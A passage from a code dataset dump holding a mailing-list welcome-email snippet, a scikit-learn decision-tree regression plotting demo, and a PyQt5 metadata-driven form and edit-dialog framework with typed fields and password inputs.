= template.render(path, template_values)\n\n send_mail(member.name, member.email, \"Gaggle Mail\", \"help@gaggle-mail.com\", \"[\" + found_list.name + \"] Welcome to the mailing list\", rendered_mail, None)\n\n","sub_path":"app/manage_members.py","file_name":"manage_members.py","file_ext":"py","file_size_in_byte":6025,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"413356363","text":"import numpy as np\nfrom sklearn.tree import DecisionTreeRegressor\nimport matplotlib.pyplot as plt\n\nN = 100\nX = np.random.rand(N)*6 - 3\nX.sort()\n\ny = np.sin(X) + np.random.rand(N) * 0.05\n#print(y)\n#print(X)\nX = X.reshape(-1,1) #将一维数组转化为矩阵\n#print(X)\n\ndt_reg = DecisionTreeRegressor(criterion='mse', max_depth=3)\ndt_reg.fit(X, y)\n\nX_test = np.linspace(-3,3,50).reshape(-1,1)\ny_hat = dt_reg.predict(X_test)\n\nplt.plot(X, y, 'y*', label='actual')\nplt.plot(X_test, y_hat, 'b-', linewidth=2, label='predict')\nplt.legend(loc = 'upper left')\nplt.grid()\nplt.show()\n\n# 采用for循环,比较不同深度的决策树的拟合、预测效果\ndepth = [2, 4, 6, 8, 10]\ncolors = 'rgbmy'\ndt_reg_0 = DecisionTreeRegressor()\nplt.plot(X, y, 'ko', label='actual')\nfor d, c in zip(depth, colors): #for循环中使用zip(),同时并列迭代两个参数\n dt_reg_0.set_params(max_depth=d)\n dt_reg_0.fit(X, y)\n y_hat_0 = dt_reg_0.predict(X_test)\n plt.plot(X_test, y_hat_0, '-', color=c, linewidth=2, label=\"depth=%d\"%d)\nplt.legend(loc='upper left')\nplt.grid(b=True)\nplt.show()\n","sub_path":"decision_tree/decision_tree_regression01.py","file_name":"decision_tree_regression01.py","file_ext":"py","file_size_in_byte":1090,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"350618021","text":"#coding=utf-8\n# ycat\t\t\t2017-09-05\t create\n# 界面元数据管理器 \nimport sys,os\nimport uuid\nimport collections\nimport qtawesome as qta\t\nimport PyQt5\nfrom PyQt5.QtCore import Qt,QEvent,QPoint\nfrom PyQt5.QtGui import QPalette,QColor\nfrom PyQt5.QtWidgets import (QApplication, QGridLayout, QHBoxLayout,QLayout, QLineEdit,QVBoxLayout,QFormLayout,QLabel,QCheckBox,QComboBox,\n\t\tQSizePolicy,QTableView, QToolButton, QWidget,QTextEdit,QDialog,QPushButton,QHeaderView,QAbstractItemView)\nfrom PyQt5.QtGui import (QStandardItemModel,QStandardItem)\nimport setup\nif __name__ == '__main__':\n\tsetup.setCurPath(__file__)\nimport log\nimport ui.inputBox\nimport ui.numberBox\nimport ui.checkbox\nimport qtutility\nimport utility\nimport enhance\nimport json_codec as json\nDEFAULT_CODEC = \"utf-8\"\t\t\n\ng_modified_marker = \"*\"\n\ndef _setModified(label):\n\tt = label.text()\n\tif len(t) <= len(g_modified_marker) or t[0:len(g_modified_marker)] != g_modified_marker:\n\t\tlabel.setText(g_modified_marker+label.text())\n\t\t\t\t\ndef _clearModified(label):\n\tt = label.text()\n\tif len(t) > len(g_modified_marker) and t[0:len(g_modified_marker)] == g_modified_marker:\n\t\tlabel.setText(label.text()[len(g_modified_marker):])\n\t\t \ndef scramble(s):\n\tif len(s):\n\t\treturn utility.md5(\"ycat\"+s) \n\telse:\n\t\treturn s\n\nclass pwdCtrl(PyQt5.QtWidgets.QLineEdit):\t \n\tdef __init__(self):\n\t\tsuper(pwdCtrl, self).__init__() \n\t\tself.setEchoMode(QLineEdit.Password)\n\t\n\t#QMouseEvent\n\tdef mousePressEvent(self,event):\n\t\tself.setText(\"\")\n\t\tsuper(pwdCtrl, self).mousePressEvent(event) \n\t\t\t\n\nclass metaItem:\n\t#name为中文名\n\t#fieldName为英文名\n\t#ctrl为具体实现控件类型\n\t#valueType数据类型 \n\t#defaultValue为默认数据\n\tdef __init__(self,name,fieldName,ctrl,valueType,defaultValue=None):\n\t\tself.name = name\n\t\tself.fieldName = fieldName\n\t\tself.ctrlClass = ctrl\n\t\tself.valueType = valueType \n\t\tself.readonly = False\n\t\tself._defaultValue = defaultValue\n\t\tself.tooltip = \"\"\n\t\tself.isCheckble=False\n\t\t#numberbox\n\t\tself.min = None\n\t\tself.max = None\n\t\t\n\t\t#select\n\t\tself.items = []\t\n\t\t\n\t\t#textBox\n\t\tself.maxSize = None\n\t\tself.minSize = None\n\t\t\n\t\t#float\n\t\tself.precision = None\n\t\t\n\t\t#password\n\t\tself.scrambleFunc = None\n\t\n\t\t\n\tdef saveData(self):\n\t\tr = {}\n\t\tr[\"name\"] = self.name\n\t\tr[\"fieldName\"] = self.fieldName\n\t\tr[\"ctrlClass\"] = enhance.typeName(self.ctrlClass)\n\t\tr[\"valueType\"] = self.valueType\n\t\tr[\"tooltip\"] = self.tooltip\n\t\tif self.isCheckble:\n\t\t\tr[\"isCheckble\"] = str(self.isCheckble)\n\t\tif self.readonly:\n\t\t\tr[\"readonly\"] = str(self.readonly)\n\t\tif self._defaultValue is not None:\n\t\t\tr[\"defaultValue\"] = str(self.defaultValue)\n\t\tif self.min is not None:\n\t\t\tr[\"min\"] = self.min\n\t\tif self.max is not None:\n\t\t\tr[\"max\"] = self.max\n\t\tif self.items:\n\t\t\tr[\"items\"] = self.items\n\t\tif self.maxSize is not None:\n\t\t\tr[\"maxSize\"] = self.maxSize\n\t\tif self.minSize is not None:\n\t\t\tr[\"minSize\"] = self.minSize\n\t\tif self.precision is not None:\n\t\t\tr[\"precision\"] = self.precision\n\t\tif self.scrambleFunc is not None:\n\t\t\tr[\"scrambleFunc\"] = enhance.typeName(self.scrambleFunc)\n\t\treturn r\n\t\n\t@staticmethod\n\tdef loadData(data):\n\t\tc = enhance.getType(data[\"ctrlClass\"])\n\t\tm = metaItem(name=data[\"name\"],fieldName=data[\"fieldName\"],ctrl=c,valueType=data[\"valueType\"],defaultValue=None)\n\t\tif \"tooltip\" in data:\n\t\t\tm.tooltip = data[\"tooltip\"]\n\t\tif \"readonly\" in data:\n\t\t\tm.readonly = bool(data[\"readonly\"])\n\t\tif \"defaultValue\" in data:\n\t\t\tm.defaultValue = m.value(data[\"defaultValue\"])\n\t\tif \"min\" in data:\n\t\t\tm.min = data[\"min\"]\n\t\tif \"max\" in data:\n\t\t\tm.max = data[\"max\"]\n\t\tif \"items\" in data:\n\t\t\tm.items = data[\"items\"]\n\t\tif \"maxSize\" in data:\n\t\t\tm.maxSize = data[\"maxSize\"]\t\t\n\t\tif \"minSize\" in data:\n\t\t\tm.maxSize = data[\"minSize\"]\t\n\t\tif \"precision\" in data:\n\t\t\tm.maxSize = data[\"precision\"]\t\n\t\tif \"scrambleFunc\" in data:\n\t\t\tm.scrambleFunc = enhance.getType(data[\"scrambleFunc\"])\n\t\tif \"isCheckble\" in data:\n\t\t\tm.isCheckble = bool(data[\"isCheckble\"])\n\t\treturn m \n\t\n\tdef addCtrl(self,formLayout,editable):\n\t\tif editable:\n\t\t\tc1 = self.getCtrl()\n\t\t\tlabel = self.getLabel(self.name,editable)\n\t\t\tformLayout.addRow(label,c1)\n\t\t\tif self.valueType == \"pwd\": #and newDlg:\n\t\t\t\tc2 = self.getCtrl()\n\t\t\t\tlabel2 = self.getLabel(self.name.strip()+\"确认\")\n\t\t\t\tformLayout.addRow(label2,c2)\n\t\t\t\treturn (c1,c2),(label.findChild(QLabel, 'mainLabel'),label2.findChild(QLabel, 'mainLabel')),(label.findChild(QCheckBox, 'mainCheckBox'),label2.findChild(QCheckBox, 'mainCheckBox'))\n\t\t\telse:\n\t\t\t\treturn c1,label.findChild(QLabel, 'mainLabel'),label.findChild(QCheckBox, 'mainCheckBox')\n\t\telse:\n\t\t\tc = QLineEdit()\n\t\t\tc.setReadOnly(True)\n\t\t\tif self.tooltip:\n\t\t\t\tc.setToolTip(self.tooltip)\n\t\t\tfont = c.font()\n\t\t\tfont.setPointSize(self.meta.fontSize)\n\t\t\tqtutility.setBackgroupColor(c,\"lightgray\")\n\t\t\tc.setFont(font) \n\t\t\tlabel = self.getLabel(self.name,editable)\n\t\t\tformLayout.addRow(label,c)\n\t\t\treturn c,label.findChild(QLabel, 'mainLabel'),label.findChild(QCheckBox, 'mainCheckBox')\n\t\n\tdef getLabel(self,text,editable=False):\n\t\tif not text.endswith(\":\"):\n\t\t\ttext = text +\":\"\n\t\tc = QLabel(text)\n\t\tfont = c.font()\n\t\tfont.setPointSize(self.meta.fontSize)\n\t\tc.setFont(font)\n\t\tif self.tooltip:\n\t\t\tc.setToolTip(self.tooltip)\n\t\tw= QWidget()\n\t\tl=QHBoxLayout()\n\t\tl.setContentsMargins(0,0,0,0)\n\t\tc.setObjectName('mainLabel')\n\t\tcb= QCheckBox()\n\t\tcb.setObjectName('mainCheckBox')\n\t\tcb.setEnabled(editable)\n\t\tif self.isCheckble:\n\t\t\tl.addWidget(cb)\n\t\tl.addWidget(c)\n\t\tw.setLayout(l)\n\t\treturn w\n\t\t\n\t@property\n\tdef defaultValue(self):\n\t\tif self._defaultValue is not None:\n\t\t\treturn self._defaultValue\n\t\tif self.valueType == \"int\" or self.valueType == \"float\":\n\t\t\treturn 0\n\t\tif self.valueType == \"bool\":\n\t\t\treturn False\n\t\treturn \"\"\n\t\n\t@defaultValue.setter\n\tdef defaultValue(self,v):\n\t\tself._defaultValue = v\n\t\n\tdef getCtrl(self):\n\t\tc = self.ctrlClass()\n\t\tfont = c.font()\n\t\tfont.setPointSize(self.meta.fontSize)\n\t\tc.setFont(font) \n\t\tif self.tooltip:\n\t\t\tc.setToolTip(self.tooltip)\n\t\tif self.valueType == \"int\":\n\t\t\tif self.min is not None:\n\t\t\t\tc.setMinimum(self.min)\n\t\t\telse:\n\t\t\t\tc.setMinimum(-9999)\n\t\t\tif self.max is not None:\n\t\t\t\tc.setMaximum(self.max)\n\t\t\telse:\n\t\t\t\tc.setMaximum(9999)\n\t\telif self.valueType == \"float\":\n\t\t\tif self.min is not None:\n\t\t\t\tc.setMinimum(self.min)\n\t\t\telse:\n\t\t\t\tc.setMinimum(-9999)\n\t\t\tif self.max is not None:\n\t\t\t\tc.setMaximum(self.max)\n\t\t\telse:\n\t\t\t\tc.setMaximum(9999)\n\t\t\tif self.precision is not None:\n\t\t\t\tc.setDecimals(self.precision)\n\t\telif self.valueType == \"select\" or self.valueType == \"bool\":\n\t\t\tfor i in self.items:\n\t\t\t\tc.addItem(i[1],i[0])\n\t\telif self.valueType == \"str\":\n\t\t\t# c.setReadOnly(self.readonly)\n\t\t\tif self.maxSize:\n\t\t\t\tc.setMaxLength(self.maxSize)\n\t\tc.setEnabled(not self.readonly)\n\t\treturn c\n\t \n\tdef value(self,obj):\n\t\t#if obj == \"None\":\n\t\t#\treturn None\n\t\tif isinstance(obj,QWidget):\n\t\t\tv = qtutility.getValue(obj)\n\t\telse:\n\t\t\tv = utility.get_attr(obj,self.fieldName)\n\t\tif v is None:\n\t\t\tv = self.defaultValue\n\t\tif self.valueType == \"int\":\n\t\t\tif v == \"\":\n\t\t\t\treturn self.defaultValue\n\t\t\treturn int(v)\n\t\telif self.valueType == \"float\":\n\t\t\tif v == \"\":\n\t\t\t\treturn self.defaultValue\n\t\t\treturn float(v)\n\t\telif self.valueType == \"bool\":\n\t\t\treturn bool(v)\n\t\telif self.valueType == \"pwd\":\n\t\t\tif len(v) < 15:\n\t\t\t\t#说明是原始密码 \n\t\t\t\treturn self.scrambleFunc(v)\n\t\t\telse:\n\t\t\t\treturn v\n\t\telse:\n\t\t\treturn v\n\t\t\t\n\tdef valueStr(self,obj):\n\t\tv = self.value(obj)\n\t\tif self.valueType == \"float\": \n\t\t\tp = 2\n\t\t\tif self.precision is not None:\n\t\t\t\tp = self.precision\n\t\t\treturn (\"%0.\"+str(p)+\"f\")%v\n\t\telif self.valueType == \"pwd\":\n\t\t\treturn \"●\"*len(v)\n\t\telif self.valueType == \"select\" or self.valueType == \"bool\":\n\t\t\tfor i in self.items:\n\t\t\t\tif i[0] == v:\n\t\t\t\t\treturn str(i[1])\n\t\treturn str(v)\n\t\n\tdef setValue(self,obj,v):\n\t\tutility.set_attr(obj,self.fieldName,v)\n\t\t\n\tdef check(self,ctrls):\n\t\tif self.valueType == \"pwd\":\n\t\t\tif isinstance(ctrls,tuple):\n\t\t\t\tif qtutility.getValue(ctrls[0]) != qtutility.getValue(ctrls[1]):\n\t\t\t\t\treturn self.name+\"不同相\"\n\t\tif self.valueType == \"str\" or self.valueType == \"pwd\":\n\t\t\tif isinstance(ctrls,tuple):\n\t\t\t\tv = qtutility.getValue(ctrls[0])\n\t\t\telse:\n\t\t\t\tv = qtutility.getValue(ctrls)\n\t\t\tif v == \"\":\n\t\t\t\treturn self.name+\"不能为空\"\n\t\treturn None\t\n\t\n\t\t\t\nclass metaData: \n\tdef __init__(self,objType,title,iconName=\"\"):\n\t\tif isinstance(objType,str):\n\t\t\tobjType = enhance.getType(objType)\n\t\tself.objType = objType\n\t\tself.fields = collections.OrderedDict()\n\t\tself.title = title\n\t\tself.iconName = iconName\n\t\tself.primaryKeys = set()\n\t\tself.fontSize = 10\n\t\tself.attributes = {}\t#特殊的属性,比如对话框的大小等 \n\t\n\tdef setPrimary(self,name,*param):\n\t\tself.primaryKeys.clear()\n\t\tself.primaryKeys.add(name)\n\t\tassert name in self.fields\n\t\tfor p in param:\n\t\t\tassert p in self.fields\n\t\t\tself.primaryKeys.add(p)\n\t\n\tdef _getPrimary(self,obj):\n\t\tr = \"\"\n\t\tfor k in self.primaryKeys:\n\t\t\tv = self.fields[k].value(obj)\n\t\t\tr += str(v) + \"@@\"\n\t\treturn r\n\t \n\tdef addText(self,name,fieldName,ctrl=PyQt5.QtWidgets.QLineEdit,\n\t\t\t\t\treadonly=False,isCheckble=False,maxSize=None):\n\t\tassert fieldName not in self.fields\n\t\tm = metaItem(name,fieldName,ctrl,\"str\")\n\t\tm.readonly = readonly\n\t\tm.isCheckble = isCheckble\n\t\tm.maxSize = maxSize\n\t\tm.meta = self\n\t\tself.fields[fieldName] = m\n\t\treturn m\n\n\tdef addPwd(self,name,fieldName,ctrl=pwdCtrl,scrambleFunc = scramble):\n\t\timport ui.meta\n\t\tif ctrl == pwdCtrl:\n\t\t\tctrl = ui.meta.pwdCtrl\n\t\tif scrambleFunc == scramble:\n\t\t\tscrambleFunc = ui.meta.scramble\n\t\tassert fieldName not in self.fields\n\t\tm = metaItem(name,fieldName,ctrl,\"pwd\")\n\t\tm.scrambleFunc = scrambleFunc\n\t\tm.meta = self\n\t\tself.fields[fieldName] = m\n\t\treturn m\n\t\t\n\tdef addInt(self,name,fieldName,ctrl=PyQt5.QtWidgets.QSpinBox,min = None, max = None,readonly=False,isCheckble=False):\n\t\tassert fieldName not in self.fields\n\t\tm = metaItem(name,fieldName,ctrl,\"int\")\n\t\tm.readonly = readonly\n\t\tm.isCheckble = isCheckble\n\t\tm.min = min\n\t\tm.max = max\n\t\tm.meta = self\n\t\tself.fields[fieldName] = m\n\t\treturn m\n\t\t\n\tdef addBool(self,name,fieldName,falseText=\"\",trueText=\"\",readonly=False,isCheckble=False):\n\t\tassert fieldName not in self.fields\n\t\tctrl = PyQt5.QtWidgets.QComboBox\n\t\tm = metaItem(name,fieldName,ctrl,\"bool\")\n\t\tm.readonly = readonly\n\t\tm.isCheckble = isCheckble\n\t\tm.items = [(False,falseText),(True,trueText)]\n\t\tm.meta = self\n\t\tself.fields[fieldName] = m\n\t\treturn m\n\t\t\n\tdef addFloat(self,name,fieldName,precision=2,ctrl=PyQt5.QtWidgets.QDoubleSpinBox,min = None, max = None,readonly=False,isCheckble=False):\n\t\tassert fieldName not in self.fields\n\t\tm = metaItem(name,fieldName,ctrl,\"float\")\n\t\tm.precision = precision\n\t\tm.readonly = readonly\n\t\tm.isCheckble = isCheckble\n\t\tm.min = min\n\t\tm.max = max\n\t\tm.meta = self\n\t\tself.fields[fieldName] = m\n\t\treturn m\n\t\t\n\t#values为[(1,\"xxx1\"),(2,\"xxx2\")]的列表 \n\tdef addSelect(self,name,fieldName,items,ctrl=PyQt5.QtWidgets.QComboBox,readonly=False,isCheckble=False):\n\t\tassert fieldName not in self.fields\n\t\tm = metaItem(name,fieldName,ctrl,\"select\")\n\t\tm.readonly = readonly\n\t\tm.isCheckble = isCheckble\n\t\tm.items = items\n\t\tself.fields[fieldName] = m\n\t\tm.meta = self\n\t\treturn m\n \t\t\n\tdef addNewLine(self):\n\t\tself.fields[uuid.uuid1()] = \"newLine\"\n\t\n\tdef addSpace(self):\n\t\tself.fields[uuid.uuid1()] = \"space\"\n\t\t\n\tdef addGroup(self,name):\n\t\tself.fields[uuid.uuid1()] = name\n\t\t\n\tdef __len__(self):\n\t\treturn len(self.fields)\n\t\t\n\tdef __iter__(self):\n\t\tfor item in self.fields:\n\t\t\tyield self.fields[item]\n\t\t\t\n\tdef clearModified(self):\n\t\tfor f in self:\n\t\t\tif not isinstance(f,str):\n\t\t\t\tf.isModified = False\n\t\n\tdef save(self,fileName):\n\t\tff = []\n\t\tfor f in self.fields:\n\t\t\tf = self.fields[f]\n\t\t\tif isinstance(f,str): #newline,space \n\t\t\t\tff.append(f)\n\t\t\telse:\n\t\t\t\tff.append(f.saveData())\n\t\tr = {}\n\t\tr[\"title\"] = self.title\n\t\tr[\"iconName\"] = self.iconName\n\t\tr[\"fields\"] = ff\n\t\tr[\"primaryKeys\"] = list(self.primaryKeys)\n\t\tr[\"objType\"] = enhance.typeName(self.objType)\n\t\tr[\"fontSize\"] = self.fontSize\n\t\tif self.attributes:\n\t\t\tr[\"attributes\"] = self.attributes\n\t\tjson.dump_file(fileName,r)\n\t\n\t@staticmethod\n\tdef load(fileName):\n\t\tmm = metaData(None,None,None)\n\t\tr = json.load_file(fileName)\n\t\tmm.title = r[\"title\"]\n\t\tmm.iconName = r[\"iconName\"]\n\t\tif \"fontSize\" in r:\n\t\t\tmm.fontSize = r[\"fontSize\"]\n\t\tff = collections.OrderedDict()\n\t\tfor f in r[\"fields\"]:\n\t\t\tif isinstance(f,str):\t#newline,space,group \n\t\t\t\tff[uuid.uuid1()] = f\n\t\t\telse:\n\t\t\t\tm = metaItem.loadData(f)\n\t\t\t\tm.meta = mm\n\t\t\t\tif m.fieldName in ff:\n\t\t\t\t\tprint(\"repeat fieldName\",m.fieldName,ff)\n\t\t\t\tassert m.fieldName not in ff\n\t\t\t\tff[m.fieldName] = m\n\t\tmm.fields = ff\n\t\tmm.objType = enhance.getType(r[\"objType\"])\n\t\tmm.primaryKeys = set(r[\"primaryKeys\"])\n\t\tif \"attributes\" in r:\n\t\t\tmm.attributes = r[\"attributes\"]\n\t\treturn mm\n\t\t\n\nclass editWidget(PyQt5.QtWidgets.QWidget): \n\tdef __init__(self,obj,meta,editable):\n\t\tsuper(editWidget, self).__init__() \n\t\tself.changedCallbacks = {}\n\t\tself.enableCallbacks = {}\n\t\tself.meta = meta\n\t\tself._editable = editable\n\t\tself.ctrls = {}\t\n\t\tll = QVBoxLayout()\n\t\tself.setLayout(ll)\n\t\tself.createCtrls(obj)\n\t\tself.currentID = None\n\t\t\n\t\t\n\tdef onChanged(self,ctrl,label,event):\n\t\tif not self._editable:\n\t\t\treturn\n\t\tif ctrl.meta.value(ctrl) != ctrl.oldValue:\n\t\t\tctrl.isModified = True\n\t\t\t_setModified(label)\n\t\telse:\n\t\t\tctrl.isModified = False\n\t\t\t_clearModified(label)\n\t\tif ctrl.meta.fieldName in self.changedCallbacks:\n\t\t\tself.changedCallbacks[ctrl.meta.fieldName](ctrl.meta.fieldName,ctrl.meta.value(ctrl))\n\n\tdef onEnableChanged(self, ctrl, cb, event):\n\t\tif not self._editable:\n\t\t\treturn\n\t\tctrl.setEnabled(cb.isChecked())\n\t\tif ctrl.meta.fieldName in self.enableCallbacks:\n\t\t\tself.enableCallbacks[ctrl.meta.fieldName](ctrl.meta.fieldName, cb.isChecked())\n\n\tdef createLayout(self,layoutClass=QVBoxLayout,editable=True):\n\t\tctrls = {}\n\t\tmainLayout = layoutClass()\n\t\tmainLayout.setSpacing(20)\n\t\tmainLayout.setAlignment(Qt.AlignTop)\n\t\tl = None\n\t\tgroup = None\n\t\tfor f in self.meta:\n\t\t\tif isinstance(f,str):\n\t\t\t\tif f == \"newLine\":\n\t\t\t\t\tl = QFormLayout()\n\t\t\t\t\tl.setFormAlignment(Qt.AlignHCenter | Qt.AlignTop)\n\t\t\t\t\tl.setSpacing(10) \n\t\t\t\t\tmainLayout.addLayout(l)\n\t\t\t\telif f == \"space\":\n\t\t\t\t\tq = QWidget()\n\t\t\t\t\tq.setFixedSize(20,20)\n\t\t\t\t\tl.addRow(q)\n\t\t\t\telse:\n\t\t\t\t\tgroup = PyQt5.QtWidgets.QGroupBox(f)\n\t\t\t\t\tfont = group.font()\n\t\t\t\t\tfont.setPointSize(self.meta.fontSize)\n\t\t\t\t\tgroup.setFont(font) \n\t\t\t\t\t#group.setCheckable(True)\n\t\t\t\t\tl = QFormLayout()\n\t\t\t\t\tl.setFormAlignment(Qt.AlignHCenter | Qt.AlignTop)\n\t\t\t\t\tl.setSpacing(10) \n\t\t\t\t\tgroup.setLayout(l)\n\t\t\t\t\tmainLayout.addWidget(group)\n\t\t\t\tcontinue\n\t\t\tif l is None:\n\t\t\t\tl = QFormLayout()\n\t\t\t\tl.setFormAlignment(Qt.AlignHCenter | Qt.AlignTop)\n\t\t\t\tl.setSpacing(10) \n\t\t\t\tmainLayout.addLayout(l)\n\t\t\tc,labels,cbs = f.addCtrl(l,editable=editable)\n\t\t\tif c:\n\t\t\t\tif isinstance(c,tuple):\n\t\t\t\t\t#c[0].meta = f\n\t\t\t\t\tfor i,cc in enumerate(c):\n\t\t\t\t\t\tcc.meta = f\n\t\t\t\t\t\tcc.label = labels[i]\n\t\t\t\t\t\tcc.cb = cbs[i]\n\t\t\t\t\t\tcc.oldValue = cc.meta.value(cc)\n\t\t\t\t\t\tcc.isModified = False\n\t\t\t\t\t\tqtutility.setChangedEvent(cc,enhance.bind(self.onChanged,cc,labels[i]))\n\t\t\t\t\t\tqtutility.setChangedEvent(cc.cb,enhance.bind(self.onEnableChanged,cc,cc.cb))\n\t\t\t\telse:\n\t\t\t\t\tc.meta = f\n\t\t\t\t\tc.label = labels\n\t\t\t\t\tc.cb = cbs\n\t\t\t\t\tc.oldValue = c.meta.value(c)\n\t\t\t\t\tc.isModified = False\n\t\t\t\t\tqtutility.setChangedEvent(c,enhance.bind(self.onChanged,c,labels))\n\t\t\t\t\tqtutility.setChangedEvent(c.cb, enhance.bind(self.onEnableChanged, c, c.cb))\n\n\t\t\t\tctrls[f.fieldName] = c \n\t\treturn (mainLayout,ctrls)\n\t\n\tdef createCtrls(self,obj):\n\t\tqtutility.clearLayout(self.layout())\n\t\tl,self.ctrls = self.createLayout(editable=self.editable)\n\t\tself.layout().addLayout(l)\n\t\tself.setValue(obj)\n\t\treturn l\n\t\t\n\tdef check(self,manager=None):\n\t\tfor item in self.meta:\n\t\t\tif isinstance(item,str):\n\t\t\t\tcontinue\n\t\t\tmsg = item.check(self.ctrls[item.fieldName])\n\t\t\tif msg:\n\t\t\t\tlog.warning(msg)\n\t\t\t\treturn msg\n\t\t\tif manager:\n\t\t\t\tmsg = manager.checkRepeat(self.getObj())\n\t\t\t\tif msg:\n\t\t\t\t\tlog.warning(msg)\n\t\t\t\t\treturn msg\n\t\treturn \"\"\n\t\t\n\tdef setValue(self,obj): \n\t\tassert isinstance(obj,self.meta.objType)\n\t\tif hasattr(obj,\"id\"):\n\t\t\tself.currentID = obj.id\n\t\tif isinstance(obj,dict):\n\t\t\tif \"id\" in obj:\n\t\t\t\tself.currentID = obj[\"id\"]\n\t\t\t\t\n\t\tfor key in self.ctrls:\n\t\t\tcc = self.ctrls[key]\n\t\t\tif isinstance(cc,tuple):\n\t\t\t\tif self.editable:\n\t\t\t\t\tv = cc[0].meta.value(obj)\n\t\t\t\telse:\n\t\t\t\t\tv = cc[0].meta.valueStr(obj)\n\t\t\t\tfor c in cc:\n\t\t\t\t\tqtutility.setValue(c,v) \n\t\t\telse:\n\t\t\t\tif self.editable:\n\t\t\t\t\tv = cc.meta.value(obj)\n\t\t\t\telse:\n\t\t\t\t\tv = cc.meta.valueStr(obj)\n\t\t\t\tqtutility.setValue(cc,v) \n\t\tself.obj = obj\n\t\tself.clearModified()\n\t\treturn obj\n\t\t\n\tdef getCtrl(self,name):\n\t\tc = self.ctrls[name]\n\t\tif isinstance(c,tuple):\n\t\t\treturn c[0]\n\t\treturn c\n\t\t\n\tdef getValue(self,name):\n\t\tc = self.getCtrl(name)\n\t\treturn c.meta.value(c)\n\t\t\t\n\tdef setItem(self,name,value):\n\t\t# assert self.editable\n\t\tc = self.getCtrl(name)\n\t\tif not self.editable:\n\t\t\tvalue = c.meta.valueStr({name: value})\n\t\tqtutility.setValue(c,value)\n\n\tdef setValueEnabled(self,name,value):\n\t\tc = self.getCtrl(name)\n\t\tqtutility.setValue(c.cb,value)\n\t\t\n\tdef getObj(self,modifiedOnly=False): \n\t\treturn self._get(self.meta.objType(),modifiedOnly=modifiedOnly)\n\t\t\n\tdef getDict(self,modifiedOnly=False):\n\t\treturn self._get({},modifiedOnly=modifiedOnly)\n\t\t\n\tdef _get(self,obj,modifiedOnly):\n\t\tif self.currentID is not None:\n\t\t\tutility.set_attr(obj,\"id\",self.currentID)\n\t\tfor key in self.ctrls:\n\t\t\tcc = self.ctrls[key]\n\t\t\tb = False\n\t\t\tif isinstance(cc,tuple):\n\t\t\t\tv = cc[0].meta.value(cc[0])\n\t\t\t\tb = cc[0].isModified or cc[1].isModified\n\t\t\telse:\n\t\t\t\tb = cc.isModified\n\t\t\t\tv = cc.meta.value(cc)\n\t\t\tif modifiedOnly and not b:\n\t\t\t\tcontinue\n\t\t\tutility.set_attr(obj,key,v)\n\t\treturn obj\n\t\t\n\t@property\n\tdef editable(self):\n\t\treturn self._editable\n\t\n\t@editable.setter\n\tdef editable(self,v):\n\t\tself._editable = v\n\t\tself.createCtrls(self.obj)\n\t\t\n\tdef clearModified(self):\n\t\tlabels = []\n\t\tfor cc in self.ctrls:\n\t\t\tcc = self.ctrls[cc]\n\t\t\tif isinstance(cc,tuple):\n\t\t\t\tfor c in cc:\n\t\t\t\t\tc.oldValue = c.meta.value(c)\n\t\t\t\t\tc.isModified = False\n\t\t\t\t\tlabels.append(c.label)\n\t\t\telse:\n\t\t\t\tcc.oldValue = cc.meta.value(cc)\n\t\t\t\tcc.isModified = False\n\t\t\t\tlabels.append(cc.label)\n\t\tfor label in labels:\n\t\t\t_clearModified(label)\n\t\n\tdef setChangedEvent(self,name,callback):\n\t\tself.changedCallbacks[name] = callback\n\n\tdef setEnableChangedEvent(self,name,callback):\n\t\tself.enableCallbacks[name] = callback\n\nclass editDlg(QDialog):\n\tdef __init__(self,obj,meta,manager=None,editable=False):\n\t\tsuper(editDlg, self).__init__()\n\t\tself.setWindowFlags(Qt.WindowCloseButtonHint)\n\t\tself.ctrl = editWidget(obj,meta,editable=editable)\n\t\tself.ctrl.setChangedEvent(\"ddd\", self.ondddChanged)\n\t\tself.ctrl.setEnableChangedEvent(\"ddd\", self.ondddEnableChanged)\n\t\tself.ctrl.setChangedEvent(\"bbb\", self.ondddChanged)\n\t\tself.ctrl.setEnableChangedEvent(\"bbb\", self.ondddEnableChanged)\n\t\tself.manager = manager\n\t\tif meta.iconName:\n\t\t\tself.setWindowIcon(qta.icon(meta.iconName,color='white'))\n\t\tif \"width\" in meta.attributes:\n\t\t\tw = meta.attributes[\"width\"]\n\t\telse:\n\t\t\tw = 600\n\t\tif \"height\" in meta.attributes:\n\t\t\th = meta.attributes[\"height\"]\n\t\telse:\n\t\t\th = max(len(meta)*50,150)\n\t\tself.setFixedWidth(w)\t\t\n\t\tself.setFixedHeight(h)\t\t\n\t\t\n\t\tll = QVBoxLayout()\n\t\tll.addWidget(self.ctrl)\n\t\tll.addLayout(self.createBtns())\n\t\tself.setLayout(ll)\n\t\tself.setValue(obj)\n\t\tself.setWindowTitle(\"新建\"+meta.title) \n\t\t\n\t@property\n\tdef currentID(self):\n\t\treturn self.currentID\n\t\t\n\tdef createBtns(self):\n\t\tl2 = QHBoxLayout()\n\t\tl2.addStretch(1) \n\t\tl2.setSpacing(20)\n\t\t\n\t\tb = QPushButton(qta.icon(\"fa.edit\",scale_factor=1.1,color=\"blue\"),\"编辑\")\n\t\tb.setMinimumHeight(40)\n\t\tb.clicked.connect(self.edit)\n\t\tb.setFixedWidth(80)\n\t\tl2.addWidget(b)\n\t\t\n\t\tb = QPushButton(qta.icon(\"fa.check\",scale_factor=1.5,color=\"green\"),\"确定\")\n\t\tb.setMinimumHeight(40)\n\t\tb.clicked.connect(self.accept)\n\t\tb.setFixedWidth(80)\n\t\tself.okBtn = b\n\t\tl2.addWidget(b) \n\t\t\n\t\tb = QPushButton(qta.icon(\"fa.remove\",scale_factor=1.5,color=\"red\"),\"取消\")\n\t\tb.setMinimumHeight(40)\n\t\tb.clicked.connect(self.reject)\n\t\tb.setFixedWidth(80)\n\t\tl2.addWidget(b)\n\t\treturn l2 \n\t\t\n\tdef edit(self):\n\t\tself.ctrl.editable = not self.ctrl.editable\n\t\t\n\tdef accept(self):\n\t\tmsg = self.ctrl.check(self.manager)\n\t\tif msg:\n\t\t\tqtutility.showWaring(msg)\n\t\t\treturn\n\t\tsuper(editDlg, self).accept()\n\t\t\n\tdef setValue(self,obj): \n\t\tself.ctrl.setValue(obj)\n\t\tself.setWindowTitle(\"编辑\"+self.ctrl.meta.title)\t\n\t\treturn obj\n\t\t\n\tdef getObj(self,modifiedOnly): \n\t\treturn 